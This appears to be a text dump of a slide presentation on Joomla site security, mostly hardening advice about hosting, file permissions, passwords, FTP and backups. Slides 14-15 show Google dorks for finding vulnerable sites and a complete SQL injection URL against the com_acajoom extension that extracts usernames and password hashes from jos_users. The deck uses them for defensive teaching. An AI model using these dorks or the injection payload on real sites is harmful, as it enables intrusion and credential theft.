1.
JoomlaSecurity<br />Bare essentials to serious measures<br />Brendon Hatcher<br />Technical Director<br />Photo: flickr.com/photos/carbonnyc<br />

2.
Understanding hackers and hacking<br />Definitions of “hacker”<br />Hacker’s motivations<br />Evidence of hacking<br />

3.
What is a hacker?<br />Someone who deliberately seeks to bypass a server’s security<br />Black, grey, white hats<br />A hacked site is a broken/compromised site<br />A skilled computer programmer<br />A hacked site is a tweaked and improved site<br />A script kiddie<br />Junior hacker using otherhacker’s tools and techniques<br />

4.
Hacker’s motivations<br />To see if they can<br />To create mayhem<br />For social standing in the sub-culture<br />For political reasons – hacktivism<br />For financial reasons<br />Theft – steal ebooks, videos, games, online services etc<br />Sell data – user profiles, credit card details etc<br />Industrial sabotage - paid to break competitor sites<br />Set up zombie farms<br />Steal bandwidth<br />Host phishing pages<br />Collect passwords<br />

5.
Evidence of hacking<br />None!<br />Site trashed<br />Hacking message<br />High bandwidth use<br />Changed admin password<br />New user with admin rights<br />Server logs<br />

6.
Why be concernedabout security?<br />No-one is safe <br />Hacking is actually quite easy<br />Fixing hacked sites is tricky<br />Hacked sites are a big problem <br />

7.
No-one is safe<br />

8.
Why worry about hacking? <br />Sites are targeted at random<br />Hacking is actually quite easy<br />Vulnerable sites are easy to find<br />Vulnerable sites are easy to hack<br />Fixing hacked sites is quite tricky<br />Hacks can be invisible<br />Clients may not notice a hacked site for some time<br />Finding a clean backup may be impossible<br />Determining what has been done can be really hard<br />May be difficult to restore<br />Hardening site to avoid future hacks requires skill and focus<br />

9.
Why worry about hacking? <br />Hacked sites are a big problem<br />Business reputation<br />Angry clients<br />Site shutdown by host<br />Loss of business<br />Data theft<br />Photo: flickr.com/photos/gaetanlee/<br />

10.
Hacking aJoomla site<br />Is Joomla less secure than other systems?<br />The site must be vulnerable<br />3 steps to hacking for fun and profit<br />

11.
Is Joomla less secure than other systems?<br />Yes and No<br />Joomla has to strike a balance between security and ease of use<br />Joomla an attractive target for hackers<br />The critical mass of sites<br />Large amateur web developer user base <br />Extensions have variable security<br />The site must be vulnerable<br />

12.
3 steps to hacking for fun and profit<br />Find a vulnerability (and instructions on how to exploit it)<br />Find a vulnerable site<br />Hack the site<br />Then, sit back and enjoy fame and fortune!<br />

13.
<br />Find a vulnerability<br />Security sites<br />www.exploit-db.com, www.secunia.com<br />Various hacking sites/forums<br />Joomlavulnerable extensions list<br />docs.joomla.org/Vulnerable_Extensions_List<br />

14.
<br />Find a vulnerable site<br />Google Dork - a search phrase to find vulnerable sites<br />PHPInfo<br />intitle:phpinfo()<br />Vulnerable extensions<br />allinurl:com_acajoom<br />

15.
<br />Cut and paste hack code<br />http://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*<br />Photo: flickr.com/photos/tawheedmanzoor<br />

16.
Securityaction plan<br />Web sites are like onions<br />Levels of security<br />Web development tools<br />Strong, unique passwords everywhere<br />Continuous attention<br />

17.
Web sites arelike onions<br />Server operating system<br />Apache<br />PHP + MySQL<br /><ul><li>Joomla

18.
Extensions

19.
Users and their behaviour</li></li></ul><li>Levels of security<br />[1] Basic actions<br />[2] More complex actions<br />[3] Actions that require significant modification rights on the server (unless already implemented by default)<br />Image by echiner1<br />

20.
Web development tools<br />WHM – server administration<br />cPanel – hosting account administration<br />FileZilla – FTP app<br />Keepass – password vault<br />

21.
General advice<br />Strong, unique passwords everywhere<br />A password vault removes the need to have a single, simple password<br />Continuous attention needed<br />

22.
Creating a safehome for Joomla<br />Shared, VPS or dedicated servers?<br />Apache<br />PHP<br />MySQL<br />

23.
Shared, VPS or dedicated servers?<br />A shared server<br />Your site(s) live in the same hosting space as other sites that you do not administer<br />This is the cheapest hosting option. <br />No say over the security of the other sites on the server<br />Old shared server is the worst location for your hosting<br />A Virtual Private Server<br />Better than shared<br />Still can’t change many settings<br />

24.
Shared, VPS or dedicated servers?<br />A dedicated server<br />Still a “shared” server<br />Allow you to upgrade and tweak all the settings on a dedicated server<br />Host retains responsibility for maintenance<br />

25.
Additional security<br />Suhosin – hardens PHP<br />Samhain or Tripwire<br />Configserver firewall<br />

26.
Apache<br />[3] suExec<br />CGI scripts run under the user of the website instead of the Apache user<br />[3] Mod_security<br />Intrusion detection and prevention engine<br />

27.
PHP<br />[2] PHP5, not PHP4<br />[3] suPHP<br />PHP files are run under the user of the website instead of the Apache user<br />Globally reset all files<br />Owner – AccountUsername:AccountUsernamechown -R user:group *<br />Files – 644find . -type f -exec chmod 644 {} <br />Folders – 755find . -type d -exec chmod 755 {} <br />

28.
Hosting account<br />.htaccess files<br />[1] Activate the htaccess file in the Joomla root<br />[1] Use an .htpasswd for the /administrator/ folder<br />[3] Advanced .htaccess files<br />A LOT more important detail in the manual<br />

29.
Keeping up to date<br />Avoiding the obvious<br />Hide, and be very, very quiet<br />Spam form submissions<br />Install sh404SEF<br /><br />Securing aJoomla site<br />

30.
Keeping up to date<br />Must update Joomla core and extensions<br />Remove unused extensions<br />

31.
Avoiding the obvious<br />[1] The default database extension is jos_<br />[1] The default admin username is admin<br />[1] The default admin user ID is 62<br />[1] Change administrator access URL<br />

32.
Hide, and be very, very quiet<br />[1] SEF all URLs<br />[1] Clear the default Joomlametatags<br />[1] Clear the default Home page title<br />[1] Remove generator tag<br />[1] Change favicon<br />[2] Hide component credits<br />

33.
Spam form submissions<br />Trying to inject spam content onto your site<br />Targets Joomla core forms and extension forms<br />Install a captcha system<br />

34.
Install sh404SEF<br />SEF URLS hide from Google Dorks<br />Flood control<br />Other security settings<br />

35.
Creating a safe working environment<br />PC vulnerability to hacks<br />FTP access hacks<br />A note about users<br />“Burglar bars, electric fences, alarms…and a key left under the doormat”<br />

36.
PC vulnerability to hacks<br />[1] Install all operating system patches<br />[1] Install all application system patches<br />[1] Run comprehensive real-time protection apps<br />[1] Install Secunia PSI<br />[1] Secure your PC login<br />[1] Secure your backup storage <br />[2] Use a secure web browser<br />

37.
FTP access hacks<br />If a hacker can obtain your FTP password, they can login as you, bypassing almost every security barrier.<br />FTP passwords are stored unencrypted in your FTP program! <br />FTP authentication details pass unencrypted to the server!<br />There are several common FTP apps that store their passwords in a standard location with a standard name!<br />

38.
FTP configuration<br />[1] cPanel setup<br />Make sure that the FTP password is strong<br />[1] PC setup<br />Password vault (LastPass , Keepass ) to store the strong password<br />Make sure passwords are not stored anywhere else (including on a Post-It note on the side of the PC)<br />[1] FileZilla<br />Copy all passwords to the password vault <br />Delete all passwords from the Site Manager<br />Set FileZilla to run in Kiosk mode<br />

39.
FTP configuration<br />[2] Joomla<br />Remove the FTP details from the configuration file<br />[3] WHM<br />Disable FTP access and allow only SFTP access<br />A note about users<br />You should ideally create separate user accounts for each staff member<br />

40.
Preparing forthe worst<br />Site monitoring<br />A disaster recovery plan<br />Joomla site backups<br />Restoring a hacked site<br />

41.
Site monitoring<br />Diagnostics<br />Site down<br />Home page content changes<br />Mod_security logs (shows attempts)<br />Bandwidth use<br />Spam blacklisting<br />[3] Searching and browsing server logs<br />

42.
Disaster Recovery Plan<br />Depending on how central your web site is to your business, you may need a DRP<br />See Tom Canavan’s presentation<br />http://www.slideshare.net/coffeegroup/tom-canavan-joomla-security-and-disaster-recovery<br />Photo: flickr.com/photos/28481088@N00<br />

43.
Joomla site backups<br />Long-cycle Joomla backups are critical<br />Redundant backups lead to restful sleep<br />See my Joomla for Web Developer talk for MUCH more detail<br />

44.
Restoring a hacked site<br />Fixes the obvious problems <br />Does not address:<br />Hidden hacks<br />Shell scripts<br />Backdoors<br />Zombies<br />Continuing vulnerabilities<br />Impacts of data exposure<br />Photo: flickr.com/photos/andreweason<br />

45.
Credits/Disclaimer<br />Brendon Hatcher is the compiler of this presentation<br />The presentation is released under the Creative Commons Licence – Attribution, Non-commercial, No derivatives<br />If you don’t know what this licence means, go to creativecommons.org<br />The content is provided without warranty. It is a work in progress and represents my current understanding of Joomla security.<br />